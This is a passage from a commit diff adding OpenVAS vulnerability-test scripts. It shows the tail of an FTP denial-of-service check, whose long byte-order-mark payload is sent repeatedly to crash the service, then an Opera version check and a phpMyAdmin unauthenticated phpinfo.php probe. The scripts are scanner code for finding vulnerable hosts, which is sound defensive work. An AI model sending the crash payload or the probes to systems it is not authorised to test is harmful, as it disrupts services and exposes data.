+0xef, 0xbb, 0xbf, 0xef, 0xbb, 0xbf, 0xfe, 0xff,
+0xff, 0xef, 0xfe, 0xff, 0xff, 0xef, 0xef, 0xbb,
+0xbf, 0xfe, 0xff, 0xff, 0xef, 0xff, 0xef, 0xff,
+0xef, 0xef, 0xbb, 0xbf, 0xef, 0xbb, 0xbf, 0xff,
+0xef, 0xef, 0xbb, 0xbf, 0xff, 0xef, 0xfe, 0xff,
+0xfe, 0xff, 0xff, 0xef, 0xff, 0xef, 0xfe, 0xff,
+0xef, 0xbb, 0xbf, 0xff, 0xef, 0xff, 0xef, 0xff,
+0xef, 0xff, 0xef, 0xef, 0xbb, 0xbf, 0xfe, 0xff,
+0xef, 0xbb, 0xbf, 0xfe, 0xff, 0xef, 0xbb, 0xbf,
+0xff, 0xef, 0xfe, 0xff, 0xef, 0xbb, 0xbf, 0xef,
+0xbb, 0xbf, 0xfe, 0xff, 0xef, 0xbb, 0xbf, 0xff,
+0xef, 0xff, 0xef, 0xef, 0xbb, 0xbf, 0xff, 0xef,
+0xef, 0xbb, 0xbf, 0xef, 0xbb, 0xbf, 0xfe, 0xff,
+0xef, 0xbb, 0xbf, 0xff, 0xef, 0xfe, 0xff, 0xef,
+0xbb, 0xbf, 0xff, 0xef, 0xff, 0xef, 0xfe, 0xff,
+0xfe, 0xff, 0xff, 0xef, 0xff, 0xef, 0xef, 0xbb,
+0xbf, 0xfe, 0xff, 0xff, 0xef, 0xef, 0xbb, 0xbf,
+0xff, 0xef, 0xff, 0xef, 0xff, 0xef, 0xfe, 0xff,
+0xfe, 0xff, 0xef, 0xbb, 0xbf, 0xff, 0xef, 0xef,
+0xbb, 0xbf, 0xff, 0xef, 0xef, 0xbb, 0xbf, 0xff,
+0xef, 0xfe, 0xff, 0xff, 0xef, 0xef, 0xbb, 0xbf,
+0xef, 0xbb, 0xbf, 0xef, 0xbb, 0xbf, 0xff, 0xef,
+0xfe, 0xff, 0xfe, 0xff, 0xff, 0xef, 0xfe, 0xff,
+0xfe, 0xff, 0xff, 0xef, 0xef, 0xbb, 0xbf, 0xff,
+0xef, 0xef, 0xbb, 0xbf, 0xef, 0xbb, 0xbf, 0xef,
+0xbb, 0xbf, 0xef, 0xbb, 0xbf, 0xfe, 0xff, 0xff,
+0xef, 0xef, 0xbb, 0xbf, 0xfe, 0xff, 0xff, 0xef,
+0xff, 0xef, 0xef, 0xbb, 0xbf, 0xef, 0xbb, 0xbf,
+0xef, 0xbb, 0xbf, 0xef, 0xbb, 0xbf, 0xfe, 0xff,
+0xfe, 0xff, 0xff, 0xef, 0xfe, 0xff, 0xef, 0xbb,
+0xbf, 0xff, 0xef, 0xff, 0xef, 0xfe, 0xff, 0xff,
+0xef, 0xfe, 0xff, 0xef, 0xbb, 0xbf, 0xef, 0xbb,
+0xbf, 0xef, 0xbb, 0xbf, 0xef, 0xbb, 0xbf, 0xff,
+0xef, 0xff, 0xef, 0xef, 0xbb, 0xbf, 0xfe, 0xff,
+0xfe, 0xff, 0xff, 0xef, 0xff, 0xef, 0xff, 0xef,
+0xfe, 0xff, 0xef, 0xbb, 0xbf, 0xef, 0xbb, 0xbf,
+0xff, 0xef, 0xff, 0xef, 0xfe, 0xff, 0xff, 0xef,
+0xff, 0xef, 0xfe, 0xff, 0xff, 0xef, 0xfe, 0xff,
+0xfe, 0xff, 0xfe, 0xff, 0xff, 0xef, 0xfe, 0xff,
+0xfe, 0xff, 0xff, 0xef, 0xef, 0xbb, 0xbf, 0xef,
+0xbb, 0xbf, 0xfe, 0xff, 0xff, 0xef, 0xef, 0xbb,
+0xbf, 0xff, 0xef, 0xfe, 0xff, 0xef, 0xbb, 0xbf,
+0xff, 0xef, 0xff, 0xef, 0xef, 0xbb, 0xbf, 0xff,
+0xef, 0xfe, 0xff, 0xfe, 0xff, 0xef, 0xbb, 0xbf,
+0xef, 0xbb, 0xbf, 0xef, 0xbb, 0xbf, 0xff, 0xef,
+0xef, 0xbb, 0xbf, 0xff, 0xef, 0xef, 0xbb, 0xbf,
+0xff, 0xef, 0xfe, 0xff, 0xfe, 0xff, 0xff, 0xef,
+0xff, 0xef, 0xef, 0xbb, 0xbf, 0xff, 0xef, 0xef,
+0xbb, 0xbf, 0xfe, 0xff, 0xfe, 0xff, 0xef, 0xbb,
+0xbf, 0xfe, 0xff, 0xfe, 0xff, 0xfe, 0xff, 0xfe,
+0xff, 0xff, 0xef, 0xef, 0xbb, 0xbf, 0xef, 0xbb,
+0xbf, 0xff, 0xef, 0xfe, 0xff, 0xfe, 0xff, 0xfe,
+0xff, 0xef, 0xbb, 0xbf, 0xef, 0xbb, 0xbf, 0xef,
+0xbb, 0xbf, 0xef, 0xbb, 0xbf, 0xef, 0xbb, 0xbf,
+0xff, 0xef, 0xff, 0xef, 0xff, 0xef, 0xfe, 0xff,
+0xff, 0xef, 0xfe, 0xff, 0xef, 0xbb, 0xbf, 0xfe,
+0xff, 0xfe, 0xff, 0xfe, 0xff, 0xef, 0xbb, 0xbf,
+0xff, 0xef, 0xff, 0xef, 0xef, 0xbb, 0xbf, 0xff,
+0xef, 0xff, 0xef, 0xfe, 0xff, 0xff, 0xef, 0xfe,
+0xff, 0xef, 0xbb, 0xbf, 0xff, 0xef, 0xef, 0xbb,
+0xbf, 0xef, 0xbb, 0xbf, 0xef, 0xbb, 0xbf, 0xef,
+0xbb, 0xbf, 0xef, 0xbb, 0xbf, 0xfe, 0xff, 0xef,
+0xbb, 0xbf, 0xff, 0xef, 0xff, 0xef, 0xfe, 0xff,
+0xff, 0xef, 0xfe, 0xff, 0xfe, 0xff, 0xfe, 0xff,
+0xfe, 0xff, 0xfe, 0xff, 0xef, 0xbb, 0xbf, 0xfe,
+0xff, 0xfe, 0xff, 0xfe, 0xff, 0xef, 0xbb, 0xbf,
+0xfe, 0xff, 0xff, 0xef, 0xff, 0xef, 0xef, 0xbb,
+0xbf, 0xfe, 0xff, 0xfe, 0xff, 0xff, 0xef, 0xef,
+0xbb, 0xbf, 0xef, 0xbb, 0xbf, 0xff, 0xef, 0xff,
+0xef, 0xff, 0xef, 0xef, 0xbb, 0xbf, 0xff, 0xef,
+0xef, 0xbb, 0xbf, 0xff, 0xef, 0xff, 0xef, 0xfe,
+0xff, 0xff, 0xef, 0xef, 0xbb, 0xbf, 0xef, 0xbb,
+0xbf, 0xef, 0xbb, 0xbf, 0xef, 0xbb, 0xbf, 0xff,
+0xef, 0xff, 0xef, 0xff, 0xef, 0xfe, 0xff, 0xef,
+0xbb, 0xbf, 0xef, 0xbb, 0xbf, 0xef, 0xbb, 0xbf,
+0xfe, 0xff, 0xff, 0xef, 0xfe, 0xff, 0xfe, 0xff,
+0xef, 0xbb, 0xbf, 0xff, 0xef, 0xfe, 0xff, 0xfe,
+0xff, 0xff, 0xef, 0xef, 0xbb, 0xbf, 0xff, 0xef,
+0xff, 0xef, 0xfe, 0xff, 0xfe, 0xff, 0xfe, 0xff,
+0xff, 0xef, 0xff, 0xef, 0xff, 0xef, 0xfe, 0xff,
+0xef, 0xbb, 0xbf, 0xef, 0xbb, 0xbf, 0xff, 0xef,
+0xfe, 0xff, 0xff, 0xef, 0xfe, 0xff, 0xff, 0xef,
+0xfe, 0xff, 0xfe, 0xff, 0xfe, 0xff, 0xff, 0xef,
+0xfe, 0xff, 0xff, 0xef, 0xfe, 0xff, 0xff, 0xef,
+0xef, 0xbb, 0xbf, 0xef, 0xbb, 0xbf, 0xff, 0xef,
+0xff, 0xef, 0xff, 0xef, 0xfe, 0xff, 0xff, 0xef,
+0xfe, 0xff, 0xfe, 0xff, 0xff, 0xef, 0xfe, 0xff,
+0xef, 0xbb, 0xbf, 0xfe, 0xff, 0xef, 0xbb, 0xbf,
+0xef, 0xbb, 0xbf, 0xfe, 0xff, 0xef, 0xbb, 0xbf,
+0xff, 0xef, 0xef, 0xbb, 0xbf, 0xff, 0xef, 0xfe,
+0xff, 0xfe, 0xff, 0xfe, 0xff, 0xef, 0xbb, 0xbf,
+0xfe, 0xff, 0xef, 0xbb, 0xbf, 0xef, 0xbb, 0xbf,
+0xef, 0xbb, 0xbf, 0xff, 0xef, 0xff, 0xef, 0xfe,
+0xff, 0xef, 0xbb, 0xbf, 0xef, 0xbb, 0xbf, 0xff,
+0xef, 0xef, 0xbb, 0xbf, 0xff, 0xef, 0xfe, 0xff,
+0xff, 0xef, 0xfe, 0xff, 0xff, 0xef, 0xfe, 0xff,
+0xfe, 0xff, 0xff, 0xef, 0xef, 0xbb, 0xbf, 0xef,
+0xbb, 0xbf, 0xfe, 0xff, 0xff, 0xef, 0xef, 0xbb,
+0xbf, 0xfe, 0xff, 0xfe, 0xff, 0xfe, 0xff, 0xfe,
+0xff, 0xfe, 0xff, 0xff, 0xef, 0xff, 0xef, 0xff,
+0xef, 0xfe, 0xff, 0xfe, 0xff, 0xef, 0xbb, 0xbf,
+0xff, 0xef, 0xfe, 0xff, 0xfe, 0xff, 0xef, 0xbb,
+0xbf, 0xff, 0xef, 0xfe, 0xff, 0xef, 0xbb, 0xbf,
+0xff, 0xef, 0xff, 0xef, 0xef, 0xbb, 0xbf, 0xef,
+0xbb, 0xbf, 0xff, 0xef, 0xff, 0xef, 0xff, 0xef,
+0xef, 0xbb, 0xbf, 0xff, 0xef, 0xfe, 0xff, 0xff,
+0xef, 0xfe, 0xff, 0xef, 0xbb, 0xbf, 0xef, 0xbb,
+0xbf, 0xef, 0xbb, 0xbf, 0xef, 0xbb, 0xbf, 0xef,
+0xbb, 0xbf, 0xef, 0xbb, 0xbf, 0xef, 0xbb, 0xbf,
+0xfe, 0xff, 0xef, 0xbb, 0xbf, 0xff, 0xef, 0xff,
+0xef, 0xfe, 0xff, 0xff, 0xef, 0xef, 0xbb, 0xbf,
+0xef, 0xbb, 0xbf, 0xef, 0xbb, 0xbf, 0xff, 0xef,
+0xfe, 0xff, 0xfe, 0xff, 0xff, 0xef, 0xef, 0xbb,
+0xbf, 0xef, 0xbb, 0xbf, 0xfe, 0xff, 0xff, 0xef,
+0xef, 0xbb, 0xbf, 0xfe, 0xff, 0xfe, 0xff, 0xfe,
+0xff, 0xef, 0xbb, 0xbf, 0xff, 0xef, 0xfe, 0xff,
+0xfe, 0xff, 0xff, 0xef, 0xef, 0xbb, 0xbf, 0xef,
+0xbb, 0xbf, 0xff, 0xef, 0xfe, 0xff, 0xff, 0xef,
+0xff, 0xef, 0xff, 0xef, 0xff, 0xef, 0xef, 0xbb,
+0xbf, 0xff, 0xef, 0xef, 0xbb, 0xbf, 0xff, 0xef,
+0xef, 0xbb, 0xbf, 0xef, 0xbb, 0xbf, 0xff, 0xef,
+0xef, 0xbb, 0xbf, 0xfe, 0xff, 0xff, 0xef, 0xff,
+0xef, 0xff, 0xef, 0xef, 0xbb, 0xbf, 0xef, 0xbb,
+0xbf, 0xef, 0xbb, 0xbf, 0xef, 0xbb, 0xbf, 0xef,
+0xbb, 0xbf, 0xef, 0xbb, 0xbf, 0xfe, 0xff, 0xef,
+0xbb, 0xbf, 0xfe, 0xff, 0xfe, 0xff, 0xfe, 0xff,
+0xff, 0xef, 0xef, 0xbb, 0xbf, 0xfe, 0xff, 0xef,
+0xbb, 0xbf, 0xfe, 0xff, 0xfe, 0xff, 0xef, 0xbb,
+0xbf, 0xef, 0xbb, 0xbf, 0xff, 0xef, 0xef, 0xbb,
+0xbf, 0xef, 0xbb, 0xbf, 0xff, 0xef, 0xfe, 0xff,
+0xef, 0xbb, 0xbf, 0xef, 0xbb, 0xbf, 0xef, 0xbb,
+0xbf, 0xfe, 0xff, 0xff, 0xef, 0xff, 0xef, 0xfe,
+0xff, 0xfe, 0xff, 0xfe, 0xff, 0xfe, 0xff, 0xef,
+0xbb, 0xbf, 0xff, 0xef, 0xff, 0xef, 0xfe, 0xff,
+0xff, 0xef, 0xef, 0xbb, 0xbf, 0xef, 0xbb, 0xbf,
+0xef, 0xbb, 0xbf, 0xff, 0xef, 0xfe, 0xff, 0xef,
+0xbb, 0xbf, 0xff, 0xef, 0xef, 0xbb, 0xbf, 0xff,
+0xef, 0xff, 0xef, 0xfe, 0xff, 0xef, 0xbb, 0xbf,
+0xff, 0xef, 0xfe, 0xff, 0xfe, 0xff, 0xef, 0xbb,
+0xbf, 0xff, 0xef, 0xef, 0xbb, 0xbf, 0xff, 0xef,
+0xfe, 0xff, 0xfe, 0xff, 0xff, 0xef, 0xff, 0xef,
+0xef, 0xbb, 0xbf, 0xfe, 0xff, 0xef, 0xbb, 0xbf,
+0xff, 0xef, 0xff, 0xef, 0xfe, 0xff, 0xef, 0xbb,
+0xbf, 0xef, 0xbb, 0xbf, 0xfe, 0xff, 0xef, 0xbb,
+0xbf, 0xef, 0xbb, 0xbf, 0xff, 0xef, 0xef, 0xbb,
+0xbf, 0xff, 0xef, 0xef, 0xbb, 0xbf, 0xfe, 0xff,
+0xef, 0xbb, 0xbf, 0xfe, 0xff, 0xff, 0xef, 0xfe,
+0xff, 0xef, 0xbb, 0xbf, 0xff, 0xef, 0xef, 0xbb,
+0xbf, 0xfe, 0xff, 0xef, 0xbb, 0xbf, 0xef, 0xbb,
+0xbf, 0xff, 0xef, 0xfe, 0xff, 0xfe, 0xff, 0xff,
+0xef, 0xfe, 0xff, 0xef, 0xbb, 0xbf, 0xff, 0xef,
+0xfe, 0xff, 0xef, 0xbb, 0xbf, 0xfe, 0xff, 0xff,
+0xef, 0xff, 0xef, 0xfe, 0xff, 0xff, 0xef, 0xef,
+0xbb, 0xbf, 0xef, 0xbb, 0xbf, 0xef, 0xbb, 0xbf,
+0xef, 0xbb, 0xbf, 0xef, 0xbb, 0xbf, 0xfe, 0xff,
+0xef, 0xbb, 0xbf, 0xfe, 0xff, 0xef, 0xbb, 0xbf,
+0xef, 0xbb, 0xbf, 0xef, 0xbb, 0xbf, 0xfe, 0xff,
+0xef, 0xbb, 0xbf, 0xef, 0xbb, 0xbf, 0xfe, 0xff,
+0xff, 0xef, 0xff, 0xef, 0xfe, 0xff, 0xfe, 0xff,
+0xef, 0xbb, 0xbf, 0xfe, 0xff, 0xfe, 0xff, 0xfe,
+0xff, 0xfe, 0xff, 0xfe, 0xff, 0xfe, 0xff, 0xff,
+0xef, 0xfe, 0xff, 0xff, 0xef, 0xff, 0xef, 0xff,
+0xef, 0xff, 0xef, 0xfe, 0xff, 0xfe, 0xff, 0xef,
+0xbb, 0xbf, 0xff, 0xef, 0xff, 0xef, 0xef, 0xbb,
+0xbf, 0xff, 0xef, 0xef, 0xbb, 0xbf, 0xff, 0xef,
+0xfe, 0xff, 0xef, 0xbb, 0xbf, 0xff, 0xef, 0xfe,
+0xff, 0xff, 0xef, 0xef, 0xbb, 0xbf, 0xff, 0xef,
+0xef, 0xbb, 0xbf, 0xef, 0xbb, 0xbf, 0xff, 0xef,
+0xfe, 0xff, 0xef, 0xbb, 0xbf, 0xef, 0xbb, 0xbf,
+0xef, 0xbb, 0xbf, 0xfe, 0xff, 0xef, 0xbb, 0xbf,
+0xfe, 0xff, 0xff, 0xef, 0xef, 0xbb, 0xbf, 0xef,
+0xbb, 0xbf, 0xef, 0xbb, 0xbf, 0xef, 0xbb, 0xbf,
+0xef, 0xbb, 0xbf, 0xef, 0xbb, 0xbf, 0xef, 0xbb,
+0xbf, 0xfe, 0xff, 0xef, 0xbb, 0xbf, 0xef, 0xbb,
+0xbf, 0xef, 0xbb, 0xbf, 0xef, 0xbb, 0xbf, 0xfe,
+0xff, 0xfe, 0xff, 0xff, 0xef, 0xfe, 0xff, 0xef,
+0xbb, 0xbf, 0xef, 0xbb, 0xbf, 0xfe, 0xff, 0xff,
+0xef, 0xff, 0xef, 0xef, 0xbb, 0xbf, 0xef, 0xbb,
+0xbf, 0xef, 0xbb, 0xbf, 0xfe, 0xff, 0xef, 0xbb,
+0xbf, 0xfe, 0xff, 0xef, 0xbb, 0xbf, 0xef, 0xbb,
+0xbf, 0xef, 0xbb, 0xbf, 0xfe, 0xff, 0xef, 0xbb,
+0xbf, 0xfe, 0xff, 0xef, 0xbb, 0xbf, 0xff, 0xef,
+0xfe, 0xff, 0xef, 0xbb, 0xbf, 0xff, 0xef, 0xff,
+0xef, 0xfe, 0xff, 0xfe, 0xff, 0xfe, 0xff, 0xef,
+0xbb, 0xbf, 0xfe, 0xff, 0xef, 0xbb, 0xbf, 0xfe,
+0xff, 0xff, 0xef, 0xfe, 0xff, 0xfe, 0xff, 0xff,
+0xef, 0xff, 0xef, 0xfe, 0xff, 0xff, 0xef, 0xff,
+0xef, 0xef, 0xbb, 0xbf, 0xef, 0xbb, 0xbf, 0xef,
+0xbb, 0xbf, 0xfe, 0xff, 0xff, 0xef, 0xef, 0xbb,
+0xbf, 0xff, 0xef, 0xfe, 0xff, 0xff, 0xef, 0xfe,
+0xff, 0xef, 0xbb, 0xbf, 0xef, 0xbb, 0xbf, 0xff,
+0xef, 0xef, 0xbb, 0xbf, 0xfe, 0xff, 0xff, 0xef,
+0xff, 0xef, 0xff, 0xef, 0xff, 0xef, 0xff, 0xef,
+0xfe, 0xff, 0xef, 0xbb, 0xbf, 0xfe, 0xff, 0xff,
+0xef, 0xff, 0xef, 0xff, 0xef, 0xfe, 0xff, 0xef,
+0xbb, 0xbf, 0xff, 0xef, 0xfe, 0xff, 0xfe, 0xff,
+0xef, 0xbb, 0xbf, 0xff, 0xef, 0xfe, 0xff, 0xef,
+0xbb, 0xbf, 0xfe, 0xff, 0xff, 0xef, 0xfe, 0xff,
+0xef, 0xbb, 0xbf, 0xef, 0xbb, 0xbf, 0xfe, 0xff,
+0xff, 0xef, 0xff, 0xef, 0xff, 0xef, 0xef, 0xbb,
+0xbf, 0xef, 0xbb, 0xbf, 0xfe, 0xff, 0xef, 0xbb,
+0xbf, 0xef, 0xbb, 0xbf, 0xff, 0xef, 0xef, 0xbb,
+0xbf, 0xef, 0xbb, 0xbf, 0xfe, 0xff, 0xef, 0xbb,
+0xbf, 0xfe, 0xff, 0xef, 0xbb, 0xbf, 0xef, 0xbb,
+0xbf, 0xfe, 0xff, 0xff, 0xef, 0xef, 0xbb, 0xbf,
+0xef, 0xbb, 0xbf, 0xff, 0xef, 0xff, 0xef, 0xfe,
+0xff, 0xff, 0xef, 0xef, 0xbb, 0xbf, 0xff, 0xef,
+0xef, 0xbb, 0xbf, 0xff, 0xef, 0xff, 0xef, 0xff,
+0xef, 0xef, 0xbb, 0xbf, 0xef, 0xbb, 0xbf, 0xef,
+0xbb, 0xbf, 0xef, 0xbb, 0xbf, 0xff, 0xef, 0xff,
+0xef, 0xfe, 0xff, 0xfe, 0xff, 0xfe, 0xff, 0xfe,
+0xff, 0xff, 0xef, 0xfe, 0xff, 0xef, 0xbb, 0xbf,
+0xef, 0xbb, 0xbf, 0xff, 0xef, 0xef, 0xbb, 0xbf,
+0xff, 0xef, 0xfe, 0xff, 0xff, 0xef, 0xff, 0xef,
+0xff, 0xef, 0xef, 0xbb, 0xbf, 0xef, 0xbb, 0xbf,
+0xff, 0xef, 0xff, 0xef, 0xff, 0xef, 0xef, 0xbb,
+0xbf, 0xfe, 0xff, 0xef, 0xbb, 0xbf, 0xef, 0xbb,
+0xbf, 0xff, 0xef, 0xef, 0xbb, 0xbf, 0xef, 0xbb,
+0xbf, 0xfe, 0xff, 0xef, 0xbb, 0xbf, 0xff, 0xef,
+0xef, 0xbb, 0xbf, 0xef, 0xbb, 0xbf, 0xff, 0xef,
+0xef, 0xbb, 0xbf, 0xfe, 0xff, 0xef, 0xbb, 0xbf,
+0xef, 0xbb, 0xbf, 0xfe, 0xff, 0xef, 0xbb, 0xbf,
+0xef, 0xbb, 0xbf, 0xef, 0xbb, 0xbf, 0xff, 0xef,
+0xff, 0xef, 0xef, 0xbb, 0xbf, 0xef, 0xbb, 0xbf,
+0xef, 0xbb, 0xbf, 0xff, 0xef, 0xfe, 0xff, 0xfe,
+0xff, 0xfe, 0xff, 0xfe, 0xff, 0xfe, 0xff, 0xff,
+0xef, 0xff, 0xef, 0xff, 0xef, 0xef, 0xbb, 0xbf,
+0xef, 0xbb, 0xbf, 0xff, 0xef, 0xef, 0xbb, 0xbf,
+0xff, 0xef, 0xfe, 0xff, 0xef, 0xbb, 0xbf, 0xff,
+0xef, 0xfe, 0xff, 0xff, 0xef, 0xef, 0xbb, 0xbf,
+0xef, 0xbb, 0xbf, 0xef, 0xbb, 0xbf, 0xef, 0xbb,
+0xbf, 0xfe, 0xff, 0xfe, 0xff, 0xef, 0xbb, 0xbf,
+0xfe, 0xff, 0xff, 0xef, 0xfe, 0xff, 0xef, 0xbb,
+0xbf, 0xff, 0xef, 0xff, 0xef, 0xef, 0xbb, 0xbf,
+0xff, 0xef, 0xef, 0xbb, 0xbf, 0xfe, 0xff, 0xff,
+0xef, 0xff, 0xef, 0xff, 0xef, 0xef, 0xbb, 0xbf,
+0xef, 0xbb, 0xbf, 0xff, 0xef, 0xef, 0xbb, 0xbf,
+0xff, 0xef, 0xff, 0xef, 0xef, 0xbb, 0xbf, 0xfe,
+0xff, 0xff, 0xef, 0xef, 0xbb, 0xbf, 0xfe, 0xff,
+0xff, 0xef, 0xef, 0xbb, 0xbf, 0xef, 0xbb, 0xbf,
+0xff, 0xef, 0xef, 0xbb, 0xbf, 0xff, 0xef, 0xfe,
+0xff, 0xef, 0xbb, 0xbf, 0xef, 0xbb, 0xbf, 0xff,
+0xef, 0xef, 0xbb, 0xbf, 0xef, 0xbb, 0xbf, 0xff,
+0xef, 0xef, 0xbb, 0xbf, 0xff, 0xef, 0xef, 0xbb,
+0xbf, 0xef, 0xbb, 0xbf, 0xef, 0xbb, 0xbf, 0xef,
+0xbb, 0xbf, 0xef, 0xbb, 0xbf, 0xfe, 0xff, 0xff,
+0xef, 0xfe, 0xff, 0xef, 0xbb, 0xbf, 0xfe, 0xff,
+0xff, 0xef, 0xff, 0xef, 0xff, 0xef, 0xff, 0xef,
+0xef, 0xbb, 0xbf, 0xfe, 0xff, 0xff, 0xef, 0xef,
+0xbb, 0xbf, 0xff, 0xef, 0xfe, 0xff, 0xef, 0xbb,
+0xbf, 0xfe, 0xff, 0xef, 0xbb, 0xbf, 0xef, 0xbb,
+0xbf, 0xef, 0xbb, 0xbf, 0x0d, 0x0a );
+
+## Open TCP Socket
+soc = open_sock_tcp(ftpPort);
+if(!soc) {
+  exit(0);
+}
+
+get = recv_line(socket:soc, length:100);
+
+## Sending Attack
+for(i=0; i<3; i++)
+{
+  snd = send(socket:soc, data:attack);
+
+  ## Check Socket Status
+  if(snd < 0)
+  {
+    security_hole(port:ftpPort);
+    exit(0);
+  }
+  get = recv_line(socket:soc, length:6400);
+}
+close(soc);

Added: trunk/openvas-plugins/scripts/gb_opera_mult_vuln_win_dec10.nasl
===================================================================
--- trunk/openvas-plugins/scripts/gb_opera_mult_vuln_win_dec10.nasl	2010-12-23 15:24:46 UTC (rev 9815)
+++ trunk/openvas-plugins/scripts/gb_opera_mult_vuln_win_dec10.nasl	2010-12-27 08:55:05 UTC (rev 9816)
@@ -0,0 +1,96 @@
+###############################################################################
+# OpenVAS Vulnerability Test
+# $Id: gb_opera_mult_vuln_win_dec10.nasl 12759 2010-12-22 11:51:11Z dec $
+#
+# Opera Browser Multiple Vulnerabilities December-10 (Windows)
+#
+# Authors:
+# Madhuri D <dmadhuri at secpod.com>
+#
+# Copyright:
+# Copyright (c) 2010 Greenbone Networks GmbH, http://www.greenbone.net
+#
+# This program is free software; you can redistribute it and/or modify
+# it under the terms of the GNU General Public License version 2
+# (or any later version), as published by the Free Software Foundation.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program; if not, write to the Free Software
+# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
+###############################################################################
+
+if(description)
+{
+  script_id(801495);
+  script_version("Revision$:1.0");
+  script_cve_id("CVE-2010-4579", "CVE-2010-4580", "CVE-2010-4581", "CVE-2010-4582",
+                "CVE-2010-4583", "CVE-2010-4584", "CVE-2010-4585", "CVE-2010-4586",
+                "CVE-2010-4587");
+  script_tag(name:"cvss_base", value:"9.3");
+  script_tag(name:"risk_factor", value:"Critical");
+  script_name("Opera Browser Multiple Vulnerabilities December-10 (Windows)");
+  desc = "
+  Overview: The host is installed with Opera browser and is prone to multiple
+  vulnerabilities.
+
+  Vulnerability Insight:
+  Multiple flaws are cause due to:
+  - WAP fails to clear 'WML' form fields after manual navigation to a new web
+    site, which allows remote attackers to obtain sensitive information.
+  - Not properly constrain dialogs to appear on top of rendered documents.
+  - Unspecified vulnerability which has unknown impact and attack vectors.
+  - Not display a page's security indication, when Opera Turbo is enabled.
+  - Not properly handling security policies during updates to extensions.
+  - Fails to present information about problematic 'X.509' certificates on
+    https web sites, when 'Opera Turbo' is used.
+  - Unspecified vulnerability in the auto-update functionality, which leads
+    to a denial of service.
+  - Fails to implement the Insecure Third Party Module warning message.
+  - Enabling 'WebSockets' functionality, which has unspecified impact and
+    remote attack vectors.
+
+  Impact:
+  Successful exploitation will allow remote attackers to obtain sensitive
+  information and cause a denial of service.
+
+  Impact Level: Application
+
+  Affected Software/OS:
+  Opera Web Browser Version prior 11.00
+
+  Fix: Upgarde to Opera Web Browser Version 11.00 or later,
+  For Updates Refer, http://www.opera.com/download/
+
+  References:
+  http://www.opera.com/support/kb/view/979/
+  http://www.opera.com/support/kb/view/977/
+  http://www.opera.com/docs/changelogs/windows/1100/ ";
+
+  script_description(desc);
+  script_summary("Check for the version of Opera");
+  script_category(ACT_GATHER_INFO);
+  script_copyright("Copyright (c) 2010 Greenbone Networks GmbH");
+  script_family("General");
+  script_dependencies("secpod_opera_detection_win_900036.nasl");
+  script_require_keys("Opera/Win/Version");
+  exit(0);
+}
+
+
+include("version_func.inc");
+
+## Get Opera Version from KB
+operaVer = get_kb_item("Opera/Win/Version");
+
+if(operaVer)
+{
+  ## Grep for Opera Versions prior to 11.00
+  if(version_is_less(version:operaVer, test_version:"11.00")){
+    security_hole(0);
+  }
+}


Property changes on: trunk/openvas-plugins/scripts/gb_opera_mult_vuln_win_dec10.nasl
___________________________________________________________________
Name: svn:executable
   + *

Added: trunk/openvas-plugins/scripts/gb_phpmyadmin_security_bypass_vuln.nasl
===================================================================
--- trunk/openvas-plugins/scripts/gb_phpmyadmin_security_bypass_vuln.nasl	2010-12-23 15:24:46 UTC (rev 9815)
+++ trunk/openvas-plugins/scripts/gb_phpmyadmin_security_bypass_vuln.nasl	2010-12-27 08:55:05 UTC (rev 9816)
@@ -0,0 +1,96 @@
+###############################################################################
+# OpenVAS Vulnerability Test
+# $Id: gb_phpmyadmin_security_bypass_vuln.nasl 12727 2010-12-21 18:31:11Z dec $
+#
+# phpMyAdmin 'phpinfo.php' Security bypass Vulnerability
+#
+# Authors:
+# Madhuri D <dmadhuri at secpod.com>
+#
+# Copyright:
+# Copyright (c) 2010 Greenbone Networks GmbH, http://www.greenbone.net
+#
+# This program is free software; you can redistribute it and/or modify
+# it under the terms of the GNU General Public License version 2
+# (or any later version), as published by the Free Software Foundation.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program; if not, write to the Free Software
+# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
+###############################################################################
+
+if(description)
+{
+  script_id(801494);
+  script_version("$Revision$: 1.0");
+  script_cve_id("CVE-2010-4481");
+  script_tag(name:"cvss_base", value:"5.0");
+  script_tag(name:"risk_factor", value:"Medium");
+  script_name("phpMyAdmin 'phpinfo.php' Security bypass Vulnerability");
+  desc = "
+  Overview: The host is running phpMyAdmin and is prone to security bypass
+  vulnerability.
+
+  Vulnerability Insight:
+  The flaw is caused by missing authentication in the 'phpinfo.php' script
+  when 'PMA_MINIMUM_COMMON' is defined. This can be exploited to gain knowledge
+  of sensitive information by requesting the file directly.
+
+  Impact:
+  Successful exploitation will let the unauthenticated attackers to display
+  information related to PHP.
+
+  Impact Level: Application
+
+  Affected Software/OS:
+  phpMyAdmin version prior to 3.4.0-beta1.
+
+  Fix: Upgrade to phpMyAdmin version 3.4.0-beta1 or later
+  http://www.phpmyadmin.net/home_page/downloads.php
+
+  References:
+  http://secunia.com/advisories/42485
+  http://www.vupen.com/english/advisories/2010/3238
+  http://www.phpmyadmin.net/home_page/security/PMASA-2010-10.php ";
+
+  script_description(desc);
+  script_summary("Check if phpMyAdmin is vulnerable to security bypass");
+  script_category(ACT_ATTACK);
+  script_copyright("Copyright (C) 2010 Greenbone Networks GmbH");
+  script_family("Web application abuses");
+  script_dependencies("secpod_phpmyadmin_detect_900129.nasl");
+  script_require_ports("Services/www", 80);
+  exit(0);
+}
+
+
+include("http_func.inc");
+include("version_func.inc");
+
+## Get phpMyAdmin Port
+port = get_http_port(default:80);
+if(!port){
+  exit(0);
+}
+
+## Get phpMyAdmin path
+if(!dir = get_dir_from_kb(port:port, app:"phpMyAdmin")){
+  exit(0);
+}
+
+## Construct the Attack Request
+sndReq = http_get(item:string(dir, "/phpinfo.php"), port:port);
+rcvRes = http_send_recv(port:port, data:sndReq);
+
+## Check the response
+if(">Configuration<" >< rcvRes && ">PHP Core<" >< rcvRes &&
+   ">Apache Environment<" >< rcvRes)
+{
+  security_warning(port);
+  exit(0);
+}

Added: trunk/openvas-plugins/scripts/gb_solarftp_mult_cmds_dos_vuln.nasl
===================================================================
